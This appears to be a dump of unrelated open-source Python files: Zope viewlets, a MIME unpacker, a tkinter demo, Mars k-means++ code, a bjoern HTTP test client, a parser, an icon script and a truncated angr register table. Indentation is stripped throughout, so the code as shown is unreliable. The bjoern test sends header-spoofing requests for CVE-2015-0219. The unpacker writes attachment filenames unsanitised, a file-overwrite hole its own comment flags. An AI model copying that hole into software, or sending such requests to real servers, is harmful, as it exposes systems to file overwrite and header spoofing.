class ResourceViewletBase(zope.viewlet.viewlet.ResourceViewletBase):
pass
def JavaScriptViewlet(path):
"""Create a viewlet that can simply insert a javascript link."""
src = os.path.join(os.path.dirname(__file__), 'javascript_viewlet.pt')
klass = type('JavaScriptViewlet',
(ResourceViewletBase, ViewletBase),
{'index': ViewPageTemplateFile(src), '_path': path})
return klass
class CSSResourceViewletBase(zope.viewlet.viewlet.CSSResourceViewletBase):
pass
def CSSViewlet(path, media="all", rel="stylesheet"):
"""Create a viewlet that can simply insert a javascript link."""
src = os.path.join(os.path.dirname(__file__), 'css_viewlet.pt')
klass = type('CSSViewlet',
(CSSResourceViewletBase, ViewletBase),
{'index': ViewPageTemplateFile(src),
'_path': path,
'_media': media,
'_rel': rel})
return klass
|
python-3.6.0/Doc/includes/email-unpack.py | emacslisp/python | 854 | 9518 | #!/usr/bin/env python3
"""Unpack a MIME message into a directory of files."""
import os
import email
import mimetypes
from email.policy import default
from argparse import ArgumentParser
def main():
parser = ArgumentParser(description="""\
Unpack a MIME message into a directory of files.
""")
parser.add_argument('-d', '--directory', required=True,
help="""Unpack the MIME message into the named
directory, which will be created if it doesn't already
exist.""")
parser.add_argument('msgfile')
args = parser.parse_args()
with open(args.msgfile, 'rb') as fp:
msg = email.message_from_binary_file(fp, policy=default)
try:
os.mkdir(args.directory)
except FileExistsError:
pass
counter = 1
for part in msg.walk():
# multipart/* are just containers
if part.get_content_maintype() == 'multipart':
continue
# Applications should really sanitize the given filename so that an
# email message can't be used to overwrite important files
filename = part.get_filename()
if not filename:
ext = mimetypes.guess_extension(part.get_content_type())
if not ext:
# Use a generic bag-of-bits extension
ext = '.bin'
filename = 'part-%03d%s' % (counter, ext)
counter += 1
with open(os.path.join(args.directory, filename), 'wb') as fp:
fp.write(part.get_payload(decode=True))
if __name__ == '__main__':
main()
|
tkinter_examples/draw_chess_board.py | DazEB2/SimplePyScripts | 117 | 9520 | <filename>tkinter_examples/draw_chess_board.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from tkinter import *
root = Tk()
root.title('Chess board')
canvas = Canvas(root, width=700, height=700, bg='#fff')
canvas.pack()
fill = '#fff'
outline = '#000'
size = 88
for i in range(8):
for j in range(8):
x1, y1, x2, y2 = i * size, j * size, i * size + size, j * size + size
canvas.create_rectangle(x1, y1, x2, y2, fill=fill, outline=outline)
fill, outline = outline, fill
fill, outline = outline, fill
root.mainloop()
|
mars/learn/cluster/_k_means_init.py | hxri/mars | 2,413 | 9549 | <filename>mars/learn/cluster/_k_means_init.py<gh_stars>1000+
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from ... import opcodes
from ... import tensor as mt
from ...core import OutputType, recursive_tile
from ...core.operand import OperandStage
from ...serialization.serializables import KeyField, Int32Field
from ...tensor.array_utils import as_same_device, device
from ...tensor.core import TensorOrder
from ...tensor.random import RandomStateField
from ...utils import has_unknown_shape
from ..metrics import euclidean_distances
from ..operands import LearnOperand, LearnOperandMixin
def _kmeans_plus_plus_init(X,
x_squared_norms,
random_state,
n_clusters: int,
n_local_trials: int = None):
n_samples, n_features = X.shape
centers = mt.empty((n_clusters, n_features), dtype=X.dtype)
assert x_squared_norms is not None, 'x_squared_norms None in _k_init'
# Set the number of local seeding trials if none is given
if n_local_trials is None:
# This is what Arthur/Vassilvitskii tried, but did not report
# specific results for other than mentioning in the conclusion
# that it helped.
n_local_trials = 2 + int(np.log(n_clusters))
# Pick first center randomly
center_id = random_state.randint(n_samples)
if X.issparse(): # pragma: no cover
centers[0] = X[center_id].todense()
else:
centers[0] = X[center_id]
# Initialize list of closest distances and calculate current potential
closest_dist_sq = euclidean_distances(
centers[0, mt.newaxis], X, Y_norm_squared=x_squared_norms,
squared=True)
current_pot = closest_dist_sq.sum()
# Pick the remaining n_clusters-1 points
for c in range(1, n_clusters):
# Choose center candidates by sampling with probability proportional
# to the squared distance to the closest existing center
rand_vals = random_state.random_sample(n_local_trials) * current_pot
candidate_ids = mt.searchsorted(closest_dist_sq.cumsum(),
rand_vals)
# XXX: numerical imprecision can result in a candidate_id out of range
candidate_ids = mt.clip(candidate_ids, None, closest_dist_sq.size - 1)
# Compute distances to center candidates
distance_to_candidates = euclidean_distances(
X[candidate_ids], X, Y_norm_squared=x_squared_norms, squared=True)
# update closest distances squared and potential for each candidate
distance_to_candidates = mt.minimum(closest_dist_sq, distance_to_candidates)
candidates_pot = distance_to_candidates.sum(axis=1)
# Decide which candidate is the best
best_candidate = mt.argmin(candidates_pot)
current_pot = candidates_pot[best_candidate]
closest_dist_sq = distance_to_candidates[best_candidate]
best_candidate = candidate_ids[best_candidate]
# Permanently add best center candidate found in local tries
if X.issparse(): # pragma: no cover
c_center = X[best_candidate].todense()
else:
c_center = X[best_candidate]
centers[c] = c_center
return centers
class KMeansPlusPlusInit(LearnOperand, LearnOperandMixin):
_op_type_ = opcodes.KMEANS_PLUS_PLUS_INIT
_x = KeyField('x')
_n_clusters = Int32Field('n_clusters')
_x_squared_norms = KeyField('x_squared_norms')
_state = RandomStateField('state')
_n_local_trials = Int32Field('n_local_trials')
def __init__(self, x=None, n_clusters=None, x_squared_norms=None,
state=None, n_local_trials=None, output_types=None, **kw):
super().__init__(_x=x, _n_clusters=n_clusters, _x_squared_norms=x_squared_norms,
_state=state, _n_local_trials=n_local_trials,
_output_types=output_types, **kw)
if self._output_types is None:
self._output_types = [OutputType.tensor]
@property
def x(self):
return self._x
@property
def n_clusters(self):
return self._n_clusters
@property
def x_squared_norms(self):
return self._x_squared_norms
@property
def state(self):
return self._state
@property
def n_local_trials(self):
return self._n_local_trials
def _set_inputs(self, inputs):
super()._set_inputs(inputs)
self._x = self._inputs[0]
self._x_squared_norms = self._inputs[-1]
def __call__(self):
inputs = [self._x, self._x_squared_norms]
kw = {
'shape': (self._n_clusters, self._x.shape[1]),
'dtype': self._x.dtype,
'order': TensorOrder.C_ORDER
}
return self.new_tileable(inputs, kws=[kw])
@classmethod
def _tile_one_chunk(cls, op: "KMeansPlusPlusInit"):
out = op.outputs[0]
chunk_op = op.copy().reset_key()
chunk_kw = out.params.copy()
chunk_kw['index'] = (0, 0)
chunk_inputs = [op.x.chunks[0], op.x_squared_norms.chunks[0]]
chunk = chunk_op.new_chunk(chunk_inputs, kws=[chunk_kw])
kw = out.params
kw['chunks'] = [chunk]
kw['nsplits'] = tuple((s,) for s in out.shape)
new_op = op.copy()
return new_op.new_tileables(op.inputs, kws=[kw])
@classmethod
def tile(cls, op: "KMeansPlusPlusInit"):
if len(op.x.chunks) == 1:
assert len(op.x_squared_norms.chunks) == 1
return cls._tile_one_chunk(op)
else:
return (yield from cls._tile_k_init(op))
@classmethod
def _tile_k_init(cls, op: "KMeansPlusPlusInit"):
X = op.x
n_clusters = op.n_clusters
x_squared_norms = op.x_squared_norms
random_state = op.state
n_local_trials = op.n_local_trials
centers = _kmeans_plus_plus_init(X, x_squared_norms, random_state,
n_clusters, n_local_trials)
return (yield from recursive_tile(centers))
@classmethod
def execute(cls, ctx, op: "KMeansPlusPlusInit"):
try:
from sklearn.cluster._kmeans import _kmeans_plusplus
except ImportError: # pragma: no cover
try:
from sklearn.cluster._kmeans import _k_init
except ImportError:
from sklearn.cluster.k_means_ import _k_init
def _kmeans_plusplus(*args, **kwargs):
return _k_init(*args, **kwargs), None
(x, x_squared_norms), device_id, _ = as_same_device(
[ctx[inp.key] for inp in op.inputs], device=op.device, ret_extra=True)
with device(device_id):
ctx[op.outputs[0].key] = _kmeans_plusplus(
x, op.n_clusters, x_squared_norms=x_squared_norms, random_state=op.state,
n_local_trials=op.n_local_trials)[0]
###############################################################################
# Initialization heuristic
def _k_init(X, n_clusters, x_squared_norms, random_state, n_local_trials=None):
"""Init n_clusters seeds according to k-means++
Parameters
----------
X : array or sparse matrix, shape (n_samples, n_features)
The data to pick seeds for. To avoid memory copy, the input data
should be double precision (dtype=np.float64).
n_clusters : integer
The number of seeds to choose
x_squared_norms : array, shape (n_samples,)
Squared Euclidean norm of each data point.
random_state : int, RandomState instance
The generator used to initialize the centers. Use an int to make the
randomness deterministic.
See :term:`Glossary <random_state>`.
n_local_trials : integer, optional
The number of seeding trials for each center (except the first),
of which the one reducing inertia the most is greedily chosen.
Set to None to make the number of trials depend logarithmically
on the number of seeds (2+log(k)); this is the default.
Notes
-----
Selects initial cluster centers for k-mean clustering in a smart way
to speed up convergence. see: <NAME>. and <NAME>.
"k-means++: the advantages of careful seeding". ACM-SIAM symposium
on Discrete algorithms. 2007
Version ported from http://www.stanford.edu/~darthur/kMeansppTest.zip,
which is the implementation used in the aforementioned paper.
"""
op = KMeansPlusPlusInit(x=X, n_clusters=n_clusters, x_squared_norms=x_squared_norms,
state=random_state, n_local_trials=n_local_trials)
return op()
class KMeansScalablePlusPlusInit(LearnOperand, LearnOperandMixin):
_op_type_ = opcodes.KMEANS_SCALABLE_PLUS_PLUS_INIT
_x = KeyField('x')
_n_clusters = Int32Field('n_clusters')
_x_squared_norms = KeyField('x_squared_norms')
_state = RandomStateField('state')
_init_iter = Int32Field('init_iter')
_oversampling_factor = Int32Field('oversampling_factor')
def __init__(self, x=None, n_clusters=None, x_squared_norms=None,
state=None, init_iter=None, oversampling_factor=None,
output_types=None, **kw):
super().__init__(_x=x, _n_clusters=n_clusters, _x_squared_norms=x_squared_norms,
_state=state, _init_iter=init_iter,
_oversampling_factor=oversampling_factor,
_output_types=output_types, **kw)
if self._output_types is None:
self._output_types = [OutputType.tensor]
@property
def x(self):
return self._x
@property
def n_clusters(self):
return self._n_clusters
@property
def x_squared_norms(self):
return self._x_squared_norms
@property
def state(self):
return self._state
@property
def init_iter(self):
return self._init_iter
@property
def oversampling_factor(self):
return self._oversampling_factor
def _set_inputs(self, inputs):
super()._set_inputs(inputs)
if self._x is not None:
self._x = self._inputs[0]
if self._x_squared_norms is not None:
self._x_squared_norms = self._inputs[-1]
def __call__(self):
inputs = [self._x, self._x_squared_norms]
kw = {
'shape': (self._n_clusters, self._x.shape[1]),
'dtype': self._x.dtype,
'order': TensorOrder.C_ORDER
}
return self.new_tileable(inputs, kws=[kw])
@classmethod
def tile(cls, op: "KMeansScalablePlusPlusInit"):
if has_unknown_shape(*op.inputs):
yield
x = mt.tensor(op.x)
x_squared_norms = mt.atleast_2d(op.x_squared_norms)
out = op.outputs[0]
random_state = op.state
rs = mt.random.RandomState.from_numpy(random_state)
n_samples, n_features = x.shape
n_clusters = op.n_clusters
# step 1, sample a centroid
centers = x[random_state.randint(n_samples, size=1)]
for _ in range(op.init_iter):
distances = euclidean_distances(
x, centers, X_norm_squared=x_squared_norms, squared=True)
# calculate the cost of data with respect to current centers
cost = mt.sum(mt.min(distances, axis=1))
# calculate the distribution to sample new centers
distribution = mt.full(len(distances), 1 / len(distances))
mt.true_divide(mt.min(distances, axis=1), cost,
where=cost != 0, out=distribution)
# pick new centers
new_centers_size = op.oversampling_factor * n_clusters
new_centers = x[rs.choice(n_samples, new_centers_size, p=distribution)]
centers = mt.concatenate([centers, new_centers])
# rechunk centers into one chunk
centers = (yield from recursive_tile(centers)).rechunk(centers.shape)
distances = yield from recursive_tile(euclidean_distances(
x, centers, X_norm_squared=x_squared_norms, squared=True))
map_index_to_chunks = {}
# calculate weight for each chunk
for c in distances.chunks:
map_chunk_op = KMeansScalablePlusPlusInit(stage=OperandStage.map)
map_chunk_kw = {
'shape': (len(centers),),
'dtype': np.dtype(np.int64),
'order': TensorOrder.C_ORDER,
'index': c.index
}
map_chunk = map_chunk_op.new_chunk([c], kws=[map_chunk_kw])
map_index_to_chunks[c.index] = map_chunk
combine_chunks = []
for i in range(distances.chunk_shape[0]):
map_chunks = [map_index_to_chunks[i, j]
for j in range(distances.chunk_shape[1])]
combine_chunk_op = KMeansScalablePlusPlusInit(stage=OperandStage.combine)
combine_chunk_kw = {
'shape': (len(centers),),
'dtype': np.dtype(np.int64),
'order': TensorOrder.C_ORDER,
'index': (i,)
}
combine_chunk = combine_chunk_op.new_chunk(
map_chunks, kws=[combine_chunk_kw])
combine_chunks.append(combine_chunk)
reduce_chunk_op = KMeansScalablePlusPlusInit(n_clusters=op.n_clusters,
state=random_state,
stage=OperandStage.reduce)
reduce_chunk_kw = out.params
reduce_chunk_kw['index'] = (0, 0)
reduce_chunk = reduce_chunk_op.new_chunk([centers.chunks[0]] + combine_chunks,
kws=[reduce_chunk_kw])
new_op = op.copy()
kw = out.params
kw['chunks'] = [reduce_chunk]
kw['nsplits'] = tuple((s,) for s in out.shape)
return new_op.new_tileables(op.inputs, kws=[kw])
@classmethod
def _execute_map(cls, ctx, op: "KMeansScalablePlusPlusInit"):
distances = ctx[op.inputs[0].key]
min_distance_ids = np.argmin(distances, axis=1)
min_distances = distances[range(len(distances)), min_distance_ids]
ctx[op.outputs[0].key] = (min_distances, min_distance_ids)
@classmethod
def _execute_combine(cls, ctx, op: "KMeansScalablePlusPlusInit"):
out = op.outputs[0]
all_distances, all_min_distance_ids = tuple(zip(*(ctx[inp.key] for inp in op.inputs)))
distances = np.stack(all_distances).T
min_distance_ids = np.stack(all_min_distance_ids).T
combined_min_distance_id = np.argmin(distances, axis=1)
min_distance_ids = min_distance_ids[range(len(distances)), combined_min_distance_id]
count = np.bincount(min_distance_ids)
result = np.zeros(out.shape[0], dtype=np.int64)
result[:len(count)] = count
ctx[out.key] = result
@classmethod
def _execute_reduce(cls, ctx, op: "KMeansScalablePlusPlusInit"):
from sklearn.cluster import KMeans
inputs = [ctx[inp.key] for inp in op.inputs]
count = np.zeros(inputs[1].shape[0], dtype=np.int64)
for inp in inputs[1:]:
count += inp
weight = count / count.sum()
centers = inputs[0]
kmeans = KMeans(n_clusters=op.n_clusters, n_init=1,
random_state=op.state)
kmeans.fit(centers, sample_weight=weight)
ctx[op.outputs[0].key] = kmeans.cluster_centers_
@classmethod
def execute(cls, ctx, op: "KMeansScalablePlusPlusInit"):
if op.stage == OperandStage.map:
return cls._execute_map(ctx, op)
elif op.stage == OperandStage.combine:
return cls._execute_combine(ctx, op)
else:
return cls._execute_reduce(ctx, op)
def _scalable_k_init(X, n_clusters, x_squared_norms, random_state,
oversampling_factor=2, init_iter=5):
op = KMeansScalablePlusPlusInit(x=X, n_clusters=n_clusters,
x_squared_norms=x_squared_norms,
state=random_state, init_iter=init_iter,
oversampling_factor=oversampling_factor)
return op()
|
tests/pure-req.py | rbanffy/bjoern | 2,326 | 9577 | import sys
import socket
conn = socket.create_connection(('0.0.0.0', 8080))
msgs = [
# 0 Keep-Alive, Transfer-Encoding chunked
'GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n',
# 1,2,3 Close, EOF "encoding"
'GET / HTTP/1.1\r\n\r\n',
'GET / HTTP/1.1\r\nConnection: close\r\n\r\n',
'GET / HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n',
# 4 Bad Request
'GET /%20%20% HTTP/1.1\r\n\r\n',
# 5 Bug #14
'GET /%20abc HTTP/1.0\r\n\r\n',
# 6 Content-{Length, Type}
'GET / HTTP/1.0\r\nContent-Length: 11\r\n'
'Content-Type: text/blah\r\nContent-Fype: bla\r\n'
'Content-Tength: bla\r\n\r\nhello world',
# 7 POST memory leak
'POST / HTTP/1.0\r\nContent-Length: 1000\r\n\r\n%s' % ('a'*1000),
# 8,9 CVE-2015-0219
'GET / HTTP/1.1\r\nFoo_Bar: bad\r\n\r\n',
'GET / HTTP/1.1\r\nFoo-Bar: good\r\nFoo_Bar: bad\r\n\r\n'
]
conn.send(msgs[int(sys.argv[1])].encode())
while 1:
data = conn.recv(100)
if not data: break
print(repr(data))
if data.endswith(b'0\r\n\r\n'):
if raw_input('new request? Y/n') == 'n':
exit()
conn.send(b'GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n')
|
Gelatin/parser/Parser.py | Etherbay/Gelatin | 107 | 9585 | <gh_stars>100-1000
# Copyright (c) 2010-2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import codecs
from simpleparse import parser
from .Newline import Newline
from .Indent import Indent
from .Dedent import Dedent
from .util import error
_ebnf_file = os.path.join(os.path.dirname(__file__), 'syntax.ebnf')
with open(_ebnf_file) as _thefile:
_ebnf = _thefile.read()
class Parser(parser.Parser):
def __init__(self):
self.indent = 0
offside = (
("NEWLINE", Newline(self).table()),
("INDENT", Indent(self).table()),
("DEDENT", Dedent(self).table()),
)
parser.Parser.__init__(self, _ebnf, 'root', prebuilts=offside)
def parse_string(self, input, compiler):
compiler.reset()
start, _, end = parser.Parser.parse(self, input, processor=compiler)
if end < len(input):
error(input, end)
if 'input' not in compiler.context.grammars:
error(input, end, 'Required grammar "input" not found.')
return compiler.context
def parse(self, filename, compiler, encoding='utf8'):
with codecs.open(filename, 'r', encoding=encoding) as input_file:
string = input_file.read()
return self.parse_string(string, compiler)
|
icons/svg2png.py | benburrill/formiko | 116 | 9589 | # -*- coding: utf-8 -*-
from gi.repository.GdkPixbuf import Pixbuf
from os import makedirs
def main():
for size in (16, 22, 24, 32, 48, 64, 128, 256, 512):
icon = Pixbuf.new_from_file_at_scale("formiko.svg", size, size, True)
makedirs("%dx%d" % (size, size))
icon.savev("%dx%d/formiko.png" % (size, size), "png", [], [])
if __name__ == "__main__":
main()
|
angr/engines/pcode/arch/ArchPcode_PowerPC_LE_32_QUICC.py | matthewpruett/angr | 6,132 | 9631 | ###
### This file was automatically generated
###
from archinfo.arch import register_arch, Endness, Register
from .common import ArchPcode
class ArchPcode_PowerPC_LE_32_QUICC(ArchPcode):
name = 'PowerPC:LE:32:QUICC'
pcode_arch = 'PowerPC:LE:32:QUICC'
description = 'PowerQUICC-III 32-bit little endian family'
bits = 32
ip_offset = 0x780
sp_offset = 0x4
bp_offset = sp_offset
instruction_endness = Endness.LE
register_list = [
Register('r0', 4, 0x0),
Register('r1', 4, 0x4),
Register('r2', 4, 0x8),
Register('r3', 4, 0xc),
Register('r4', 4, 0x10),
Register('r5', 4, 0x14),
Register('r6', 4, 0x18),
Register('r7', 4, 0x1c),
Register('r8', 4, 0x20),
Register('r9', 4, 0x24),
Register('r10', 4, 0x28),
Register('r11', 4, 0x2c),
Register('r12', 4, 0x30),
Register('r13', 4, 0x34),
Register('r14', 4, 0x38),
Register('r15', 4, 0x3c),
Register('r16', 4, 0x40),
Register('r17', 4, 0x44),
Register('r18', 4, 0x48),
Register('r19', 4, 0x4c),
Register('r20', 4, 0x50),
Register('r21', 4, 0x54),
Register('r22', 4, 0x58),
Register('r23', 4, 0x5c),
Register('r24', 4, 0x60),
Register('r25', 4, 0x64),
Register('r26', 4, 0x68),
Register('r27', 4, 0x6c),
Register('r28', 4, 0x70),
Register('r29', 4, 0x74),
Register('r30', 4, 0x78),
Register('r31', 4, 0x7c),
Register('xer_so', 1, 0x400),
Register('xer_ov', 1, 0x401),
Register('xer_ov32', 1, 0x402),
Register('xer_ca', 1, 0x403),
Register('xer_ca32', 1, 0x404),
Register('xer_count', 1, 0x405),
Register('fp_fx', 1, 0x500),
Register('fp_fex', 1, 0x501),
Register('fp_vx', 1, 0x502),
Register('fp_ox', 1, 0x503),
Register('fp_ux', 1, 0x504),
Register('fp_zx', 1, 0x505),
Register('fp_xx', 1, 0x506),
Register('fp_vxsnan', 1, 0x507),
Register('fp_vxisi', 1, 0x508),
Register('fp_vxidi', 1, 0x509),
Register('fp_vxzdz', 1, 0x50a),
Register('fp_vximz', 1, 0x50b),
Register('fp_vxvc', 1, 0x50c),
Register('fp_fr', 1, 0x50d),
Register('fp_fi', 1, 0x50e),
Register('fp_c', 1, 0x50f),
Register('fp_cc0', 1, 0x510),
Register('fp_cc1', 1, 0x511),
Register('fp_cc2', 1, 0x512),
Register('fp_cc3', 1, 0x513),
Register('fp_reserve1', 1, 0x514),
Register('fp_vxsoft', 1, 0x515),
Register('fp_vxsqrt', 1, 0x516),
Register('fp_vxcvi', 1, 0x517),
Register('fp_ve', 1, 0x518),
Register('fp_oe', 1, 0x519),
Register('fp_ue', 1, 0x51a),
Register('fp_ze', 1, 0x51b),
Register('fp_xe', 1, 0x51c),
Register('fp_ni', 1, 0x51d),
Register('fp_rn0', 1, 0x51e),
Register('fp_rn1', 1, 0x51f),
Register('msr', 4, 0x700),
Register('reserve_address', 4, 0x720),
Register('reserve', 1, 0x728),
Register('reserve_length', 1, 0x730),
Register('pc', 4, 0x780, alias_names=('ip',)),
Register('sr0', 4, 0x800),
Register('sr1', 4, 0x804),
Register('sr2', 4, 0x808),
Register('sr3', 4, 0x80c),
Register('sr4', 4, 0x810),
Register('sr5', 4, 0x814),
Register('sr6', 4, 0x818),
Register('sr7', 4, 0x81c),
Register('sr8', 4, 0x820),
Register('sr9', 4, 0x824),
Register('sr10', 4, 0x828),
Register('sr11', 4, 0x82c),
Register('sr12', 4, 0x830),
Register('sr13', 4, 0x834),
Register('sr14', 4, 0x838),
Register('sr15', 4, 0x83c),
Register('crall', 8, 0x900),
Register('cr0', 1, 0x900),
Register('cr1', 1, 0x901),
Register('cr2', 1, 0x902),
Register('cr3', 1, 0x903),
Register('cr4', 1, 0x904),
Register('cr5', 1, 0x905),
Register('cr6', 1, 0x906),
Register('cr7', 1, 0x907),
Register('tea', 4, 0x980),
Register('r2save', 4, 0x988),
Register('spr000', 4, 0x1000),
Register('xer', 4, 0x1004),
Register('spr002', 4, 0x1008),
Register('spr003', 4, 0x100c),
Register('spr004', 4, 0x1010),
Register('spr005', 4, 0x1014),
Register('spr006', 4, 0x1018),
Register('spr007', 4, 0x101c),
Register('lr', 4, 0x1020),
Register('ctr', 4, 0x1024),
Register('spr00a', 4, 0x1028),
Register('spr00b', 4, 0x102c),
Register('spr00c', 4, 0x1030),
Register('spr00d', 4, 0x1034),
Register('spr00e', 4, 0x1038),
Register('spr00f', 4, 0x103c),
Register('spr010', 4, 0x1040),
Register('spr011', 4, 0x1044),
Register('spr012', 4, 0x1048),
Register('spr013', 4, 0x104c),
Register('spr014', 4, 0x1050),
Register('spr015', 4, 0x1054),
Register('spr016', 4, 0x1058),
Register('spr017', 4, 0x105c),
Register('spr018', 4, 0x1060),
Register('spr019', 4, 0x1064),
Register('srr0', 4, 0x1068),
Register('srr1', 4, 0x106c),
Register('spr01c', 4, 0x1070),
Register('spr01d', 4, 0x1074),
Register('spr01e', 4, 0x1078),
Register('spr01f', 4, 0x107c),
Register('spr020', 4, 0x1080),
Register('spr021', 4, 0x1084),
Register('spr022', 4, 0x1088),
Register('spr023', 4, 0x108c),
Register('spr024', 4, 0x1090),
Register('spr025', 4, 0x1094),
Register('spr026', 4, 0x1098),
Register('spr027', 4, 0x109c),
Register('spr028', 4, 0x10a0),
Register('spr029', 4, 0x10a4),
Register('spr02a', 4, 0x10a8),
Register('spr02b', 4, 0x10ac),
Register('spr02c', 4, 0x10b0),
Register('spr02d', 4, 0x10b4),
Register('spr02e', 4, 0x10b8),
Register('spr02f', 4, 0x10bc),
Register('spr030', 4, 0x10c0),
Register('spr031', 4, 0x10c4),
Register('spr032', 4, 0x10c8),
Register('spr033', 4, 0x10cc),
Register('spr034', 4, 0x10d0),
Register('spr035', 4, 0x10d4),
Register('spr036', 4, 0x10d8),
Register('spr037', 4, 0x10dc),
Register('spr038', 4, 0x10e0),
Register('spr039', 4, 0x10e4),
Register('spr03a', 4, 0x10e8),
Register('spr03b', 4, 0x10ec),
Register('spr03c', 4, 0x10f0),
Register('spr03d', 4, 0x10f4),
Register('spr03e', 4, 0x10f8),
Register('spr03f', 4, 0x10fc),
Register('spr040', 4, 0x1100),
Register('spr041', 4, 0x1104),
Register('spr042', 4, 0x1108),
Register('spr043', 4, 0x110c),
Register('spr044', 4, 0x1110),
Register('spr045', 4, 0x1114),
Register('spr046', 4, 0x1118),
Register('spr047', 4, 0x111c),
Register('spr048', 4, 0x1120),
Register('spr049', 4, 0x1124),
Register('spr04a', 4, 0x1128),
Register('spr04b', 4, 0x112c),
Register('spr04c', 4, 0x1130),
Register('spr04d', 4, 0x1134),
Register('spr04e', 4, 0x1138),
Register('spr04f', 4, 0x113c),
Register('spr050', 4, 0x1140),
Register('spr051', 4, 0x1144),
Register('spr052', 4, 0x1148),
Register('spr053', 4, 0x114c),
Register('spr054', 4, 0x1150),
Register('spr055', 4, 0x1154),
Register('spr056', 4, 0x1158),
Register('spr057', 4, 0x115c),
Register('spr058', 4, 0x1160),
Register('spr059', 4, 0x1164),
Register('spr05a', 4, 0x1168),
Register('spr05b', 4, 0x116c),
Register('spr05c', 4, 0x1170),
Register('spr05d', 4, 0x1174),
Register('spr05e', 4, 0x1178),
Register('spr05f', 4, 0x117c),
Register('spr060', 4, 0x1180),
Register('spr061', 4, 0x1184),
Register('spr062', 4, 0x1188),
Register('spr063', 4, 0x118c),
Register('spr064', 4, 0x1190),
Register('spr065', 4, 0x1194),
Register('spr066', 4, 0x1198),
Register('spr067', 4, 0x119c),
Register('spr068', 4, 0x11a0),
Register('spr069', 4, 0x11a4),
Register('spr06a', 4, 0x11a8),
Register('spr06b', 4, 0x11ac),
Register('spr06c', 4, 0x11b0),
Register('spr06d', 4, 0x11b4),
Register('spr06e', 4, 0x11b8),
Register('spr06f', 4, 0x11bc),
Register('spr070', 4, 0x11c0),
Register('spr071', 4, 0x11c4),
Register('spr072', 4, 0x11c8),
Register('spr073', 4, 0x11cc),
Register('spr074', 4, 0x11d0),
Register('spr075', 4, 0x11d4),
Register('spr076', 4, 0x11d8),
Register('spr077', 4, 0x11dc),
Register('spr078', 4, 0x11e0),
Register('spr079', 4, 0x11e4),
Register('spr07a', 4, 0x11e8),
Register('spr07b', 4, 0x11ec),
Register('spr07c', 4, 0x11f0),
Register('spr07d', 4, 0x11f4),
Register('spr07e', 4, 0x11f8),
Register('spr07f', 4, 0x11fc),
Register('spr080', 4, 0x1200),
Register('spr081', 4, 0x1204),
Register('spr082', 4, 0x1208),
Register('spr083', 4, 0x120c),
Register('spr084', 4, 0x1210),
Register('spr085', 4, 0x1214),
Register('spr086', 4, 0x1218),
Register('spr087', 4, 0x121c),
Register('spr088', 4, 0x1220),
Register('spr089', 4, 0x1224),
Register('spr08a', 4, 0x1228),
Register('spr08b', 4, 0x122c),
Register('spr08c', 4, 0x1230),
Register('spr08d', 4, 0x1234),
Register('spr08e', 4, 0x1238),
Register('spr08f', 4, 0x123c),
Register('spr090', 4, 0x1240),
Register('spr091', 4, 0x1244),
Register('spr092', 4, 0x1248),
Register('spr093', 4, 0x124c),
Register('spr094', 4, 0x1250),
Register('spr095', 4, 0x1254),
Register('spr096', 4, 0x1258),
Register('spr097', 4, 0x125c),
Register('spr098', 4, 0x1260),
Register('spr099', 4, 0x1264),
Register('spr09a', 4, 0x1268),
Register('spr09b', 4, 0x126c),
Register('spr09c', 4, 0x1270),
Register('spr09d', 4, 0x1274),
Register('spr09e', 4, 0x1278),
Register('spr09f', 4, 0x127c),
Register('spr0a0', 4, 0x1280),
Register('spr0a1', 4, 0x1284),
Register('spr0a2', 4, 0x1288),
Register('spr0a3', 4, 0x128c),
Register('spr0a4', 4, 0x1290),
Register('spr0a5', 4, 0x1294),
Register('spr0a6', 4, 0x1298),
Register('spr0a7', 4, 0x129c),
Register('spr0a8', 4, 0x12a0),
Register('spr0a9', 4, 0x12a4),
Register('spr0aa', 4, 0x12a8),
Register('spr0ab', 4, 0x12ac),
Register('spr0ac', 4, 0x12b0),
Register('spr0ad', 4, 0x12b4),
Register('spr0ae', 4, 0x12b8),
Register('spr0af', 4, 0x12bc),
Register('spr0b0', 4, 0x12c0),
Register('spr0b1', 4, 0x12c4),
Register('spr0b2', 4, 0x12c8),
Register('spr0b3', 4, 0x12cc),
Register('spr0b4', 4, 0x12d0),
Register('spr0b5', 4, 0x12d4),
Register('spr0b6', 4, 0x12d8),
Register('spr0b7', 4, 0x12dc),
Register('spr0b8', 4, 0x12e0),
Register('spr0b9', 4, 0x12e4),
Register('spr0ba', 4, 0x12e8),
Register('spr0bb', 4, 0x12ec),
Register('spr0bc', 4, 0x12f0),
Register('spr0bd', 4, 0x12f4),
Register('spr0be', 4, 0x12f8),
Register('spr0bf', 4, 0x12fc),
Register('spr0c0', 4, 0x1300),
Register('spr0c1', 4, 0x1304),
Register('spr0c2', 4, 0x1308),
Register('spr0c3', 4, 0x130c),
Register('spr0c4', 4, 0x1310),
Register('spr0c5', 4, 0x1314),
Register('spr0c6', 4, 0x1318),
Register('spr0c7', 4, 0x131c),
